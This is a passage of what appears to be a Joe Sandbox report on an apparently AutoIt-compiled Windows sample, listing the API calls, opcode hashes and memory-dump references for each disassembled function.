                                                Similarity
                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                • String ID:
                                                • API String ID: 3356174886-0
                                                • Opcode ID: 8f263690ebfbd7ee56b3efb678f0b6120dde7da3768243eac9742da81960ac73
                                                • Instruction ID: 4d392aa7362e52e13f49ef7ffa6d5c93e94a5469f1d952b739945f8dc934f8df
                                                • Opcode Fuzzy Hash: 8f263690ebfbd7ee56b3efb678f0b6120dde7da3768243eac9742da81960ac73
                                                • Instruction Fuzzy Hash: A6A1CD35600616EBDB18DF68C9897EDBBF1FF08700F548195E854AB290DBB4ADD0CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7717b5efa3136b389c9724c7d355ab831756a986b3ea210da9d66179aae24704
                                                • Instruction ID: 8b626a628e73b6006accafe15a2e90a377b51c956ae136b50fd05f6b723f3263
                                                • Opcode Fuzzy Hash: 7717b5efa3136b389c9724c7d355ab831756a986b3ea210da9d66179aae24704
                                                • Instruction Fuzzy Hash: B2713C71900109EFCB15CFA8CC49AFEBB79FF85314F248149F915A7251C7349A52CBA5
                                                APIs
                                                • _memset.LIBCMT ref: 00B0225A
                                                • _memset.LIBCMT ref: 00B02323
                                                • ShellExecuteExW.SHELL32(?), ref: 00B02368
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                  • Part of subcall function 00ABC6F4: _wcscpy.LIBCMT ref: 00ABC717
                                                • CloseHandle.KERNEL32(00000000), ref: 00B0242F
                                                • FreeLibrary.KERNEL32(00000000), ref: 00B0243E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 4082843840-2766056989
                                                • Opcode ID: 5a759774bb84dde85274f98ccd82443e95689e88cee24491b4cd7eccdd682806
                                                • Instruction ID: e78cbf251be3e5c630323fce96c8c5370975061bc045adbb7d4cef493b548b41
                                                • Opcode Fuzzy Hash: 5a759774bb84dde85274f98ccd82443e95689e88cee24491b4cd7eccdd682806
                                                • Instruction Fuzzy Hash: 2D71AD70A00619DFCF15EFA4C995AAEBBF5FF48310F108499E856AB391CB34AD44CB94
                                                APIs
                                                • GetParent.USER32(?), ref: 00AE3DE7
                                                • GetKeyboardState.USER32(?), ref: 00AE3DFC
                                                • SetKeyboardState.USER32(?), ref: 00AE3E5D
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AE3E8B
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AE3EAA
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AE3EF0
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AE3F13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: a148c634b141822a591a37947c9aa66630bffdaad0e45283ce455ce210e71c26
                                                • Instruction ID: ec65c21c32efcf2bf9c21369859b668b0f9dec9315abe109782287e5fc2fb80c
                                                • Opcode Fuzzy Hash: a148c634b141822a591a37947c9aa66630bffdaad0e45283ce455ce210e71c26
                                                • Instruction Fuzzy Hash: 6251C2A2A047D53DFF3643368C49BBA7EE95B06304F088589E1D54B8C2D6E9AEC4D760
                                                APIs
                                                • GetParent.USER32(00000000), ref: 00AE3C02
                                                • GetKeyboardState.USER32(?), ref: 00AE3C17
                                                • SetKeyboardState.USER32(?), ref: 00AE3C78
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AE3CA4
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AE3CC1
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AE3D05
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AE3D26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 8f37674e68ccbd984dbb4611841e805e0bd36cc1a8d1e60a29180e6f6af2d0fc
                                                • Instruction ID: ac691886a935d35f9d6deca77202dff0ceb3dbb3fdbe72a866ebc2c827d1c3b9
                                                • Opcode Fuzzy Hash: 8f37674e68ccbd984dbb4611841e805e0bd36cc1a8d1e60a29180e6f6af2d0fc
                                                • Instruction Fuzzy Hash: F951F8A25047D53DFF3283368C59BBABFA96F46300F088989E0D55B4C2D695EE88D760
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: 19ac65b784c2dddb2262c4fee10f12da4b28ab5e750bd92309a95ca92e2d8bfa
                                                • Instruction ID: fff429dc0bfaa8c3753d20ecc39dbbd7f6a6f5a7bf2f42e55acdcde2aac3be6b
                                                • Opcode Fuzzy Hash: 19ac65b784c2dddb2262c4fee10f12da4b28ab5e750bd92309a95ca92e2d8bfa
                                                • Instruction Fuzzy Hash: 4F41AE66D14354B6DB10EBF5C846ECFB3ACAF45310F11896AE504F3222FA34E620C7A5
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00B03DA1
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B03DCB
                                                • FreeLibrary.KERNEL32(00000000), ref: 00B03E80
                                                  • Part of subcall function 00B03D72: RegCloseKey.ADVAPI32(?), ref: 00B03DE8
                                                  • Part of subcall function 00B03D72: FreeLibrary.KERNEL32(?), ref: 00B03E3A
                                                  • Part of subcall function 00B03D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B03E5D
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B03E25
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: b7393ae343035ed0ca70320e6b1fa957c2afbcf4960babbdfea73b703b7e612f
                                                • Instruction ID: 9c81049da2dbd5a8733fe753da5444c45bb33ec19ca5b5d0ec62ccedbfbe8e5f
                                                • Opcode Fuzzy Hash: b7393ae343035ed0ca70320e6b1fa957c2afbcf4960babbdfea73b703b7e612f
                                                • Instruction Fuzzy Hash: 6731ECB1911109BFDB159B94DC89EFFBBFCEB08700F1046AAE512E2190DA749F499B70
                                                APIs
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B08FE7
                                                • GetWindowLongW.USER32(0130EB50,000000F0), ref: 00B0901A
                                                • GetWindowLongW.USER32(0130EB50,000000F0), ref: 00B0904F
                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B09081
                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B090AB
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B090BC
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B090D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 0ea33c4d753a805078cc5dc1e05c40a5834d4ea82c9d52161a0d54ae7ca63b3e
                                                • Instruction ID: c27059db9446181720641906fbac31c8fccfa7ae21f4ea775ad19c48947d977c
                                                • Opcode Fuzzy Hash: 0ea33c4d753a805078cc5dc1e05c40a5834d4ea82c9d52161a0d54ae7ca63b3e
                                                • Instruction Fuzzy Hash: 12312238600215EFEB218F58DC84F653BE5FB4A714F1841A4F6598B2F2DFB1A841DB41
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE08F2
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE0918
                                                • SysAllocString.OLEAUT32(00000000), ref: 00AE091B
                                                • SysAllocString.OLEAUT32(?), ref: 00AE0939
                                                • SysFreeString.OLEAUT32(?), ref: 00AE0942
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AE0967
                                                • SysAllocString.OLEAUT32(?), ref: 00AE0975
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 412b7a4f0db294f5bea00bb0add321a923c744a0d133e2bf7b464cb3a546bf71
                                                • Instruction ID: c17c9caf7dd39d353c954e86b3041ca10876c188885d7fff89ddc44af5b27ea1
                                                • Opcode Fuzzy Hash: 412b7a4f0db294f5bea00bb0add321a923c744a0d133e2bf7b464cb3a546bf71
                                                • Instruction Fuzzy Hash: 5121C972600219AFAB109F79CC88DBB77ECEB08360B048125F955DB252DAB0ED85C760
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 76e67d7277c58708f11c27831b4d2faca9b64d426bf7214d6d8ae5b4abeb13a8
                                                • Instruction ID: c12792bd7610e450c6faf5152c41a56d427e5a490f20400c5b9bea542815498b
                                                • Opcode Fuzzy Hash: 76e67d7277c58708f11c27831b4d2faca9b64d426bf7214d6d8ae5b4abeb13a8
                                                • Instruction Fuzzy Hash: 7421493224469167D720AB359E12FBB73ECEF65310F60802AF44697082EB659942C3A5
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE09CB
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE09F1
                                                • SysAllocString.OLEAUT32(00000000), ref: 00AE09F4
                                                • SysAllocString.OLEAUT32 ref: 00AE0A15
                                                • SysFreeString.OLEAUT32 ref: 00AE0A1E
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AE0A38
                                                • SysAllocString.OLEAUT32(?), ref: 00AE0A46
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 7a3f38df68a76ffd231d132ad5e161da2bb8bea3f4db1830e4245e0590107bcd
                                                • Instruction ID: 9580bce7cf71800dff512376c1d4f59e018eb219707b4cc15a6ffdb7d1a9a526
                                                • Opcode Fuzzy Hash: 7a3f38df68a76ffd231d132ad5e161da2bb8bea3f4db1830e4245e0590107bcd
                                                • Instruction Fuzzy Hash: B9216875600208AFDB10EFB9DC89DAB77ECEF083607448135F919CB265DAB4ED858764
                                                APIs
                                                  • Part of subcall function 00ABD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ABD1BA
                                                  • Part of subcall function 00ABD17C: GetStockObject.GDI32(00000011), ref: 00ABD1CE
                                                  • Part of subcall function 00ABD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ABD1D8
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B0A32D
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B0A33A
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B0A345
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B0A354
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B0A360
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: b4bf4e30c8f885cda94691c390407e0901214ef1fb3f0cfcc2b52b51aea78e2b
                                                • Instruction ID: 180d1bf71939f765801393828ed479015d8c5e88ee9820a606ac99159afb5a9d
                                                • Opcode Fuzzy Hash: b4bf4e30c8f885cda94691c390407e0901214ef1fb3f0cfcc2b52b51aea78e2b
                                                • Instruction Fuzzy Hash: 3311B6B1150219BEEF115F64CC85EEB7F6DFF08798F014114FA04A60A0C7729C21DBA4
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 00ABCCF6
                                                • GetWindowRect.USER32(?,?), ref: 00ABCD37
                                                • ScreenToClient.USER32(?,?), ref: 00ABCD5F
                                                • GetClientRect.USER32(?,?), ref: 00ABCE8C
                                                • GetWindowRect.USER32(?,?), ref: 00ABCEA5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$Screen
                                                • String ID:
                                                • API String ID: 1296646539-0
                                                • Opcode ID: ca0ed9b9c919198de4df2141e23a78cc62d7dcf5d2c5a3e47f1460123c0b07f0
                                                • Instruction ID: 74f3d94f62b5ba6c4769b46986570b82c7537a9c4ac6ab75cb5f8b120c0ccce4
                                                • Opcode Fuzzy Hash: ca0ed9b9c919198de4df2141e23a78cc62d7dcf5d2c5a3e47f1460123c0b07f0
                                                • Instruction Fuzzy Hash: CEB1497990024ADBDF10CFA8C484BEDBBB5FF08310F149569EC69AB251DB70EA50DB64
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00B01C18
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00B01C26
                                                • __wsplitpath.LIBCMT ref: 00B01C54
                                                  • Part of subcall function 00AC1DFC: __wsplitpath_helper.LIBCMT ref: 00AC1E3C
                                                • _wcscat.LIBCMT ref: 00B01C69
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00B01CDF
                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B01CF1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID:
                                                • API String ID: 1380811348-0
                                                • Opcode ID: 609c54efb09e738cb662ada6032575438f544d3c47f8499182b1440df3880636
                                                • Instruction ID: 2c9aad0bb00c6144672aa7300ae065ba9dd66e45c9826af98128e6a5fbec2969
                                                • Opcode Fuzzy Hash: 609c54efb09e738cb662ada6032575438f544d3c47f8499182b1440df3880636
                                                • Instruction Fuzzy Hash: 2B516C715043009FD724EF24D985EABBBECEF89754F00496EF58597291EB30DA05CBA2
                                                APIs
                                                  • Part of subcall function 00B03C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B02BB5,?,?), ref: 00B03C1D
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B030AF
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B030EF
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B03112
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B0313B
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B0317E
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B0318B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                • String ID:
                                                • API String ID: 3451389628-0
                                                • Opcode ID: 080ad6a6fc28fc2d25e1c1f233f1926c0cec1c0f76407109350f1b02f5a549e7
                                                • Instruction ID: 2eb09677ae2555946d1eaadbd6571484df97a304ace5b36d22a8e34024603c28
                                                • Opcode Fuzzy Hash: 080ad6a6fc28fc2d25e1c1f233f1926c0cec1c0f76407109350f1b02f5a549e7
                                                • Instruction Fuzzy Hash: D0516631208300AFC714EF64C999E6ABBF9FF89710F04895DF595972A1DB31EA05CB52
                                                APIs
                                                • GetMenu.USER32(?), ref: 00B08540
                                                • GetMenuItemCount.USER32(00000000), ref: 00B08577
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B0859F
                                                • GetMenuItemID.USER32(?,?), ref: 00B0860E
                                                • GetSubMenu.USER32(?,?), ref: 00B0861C
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B0866D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostString
                                                • String ID:
                                                • API String ID: 650687236-0
                                                • Opcode ID: 880a512ba7d27c1c123d375e827f9d96aae9f48123607644874426b3dffd9a52
                                                • Instruction ID: 7b76980bdbda84af87f6aadcc459b36073824d505a85494a6f9c36a4f00553c1
                                                • Opcode Fuzzy Hash: 880a512ba7d27c1c123d375e827f9d96aae9f48123607644874426b3dffd9a52
                                                • Instruction Fuzzy Hash: 6A519C71A00614EFCF11EF64CA41AAEBBF4EF58310F1144A9E955BB391CF71AE418B90
                                                APIs
                                                • _memset.LIBCMT ref: 00AE4B10
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE4B5B
                                                • IsMenu.USER32(00000000), ref: 00AE4B7B
                                                • CreatePopupMenu.USER32 ref: 00AE4BAF
                                                • GetMenuItemCount.USER32(000000FF), ref: 00AE4C0D
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AE4C3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
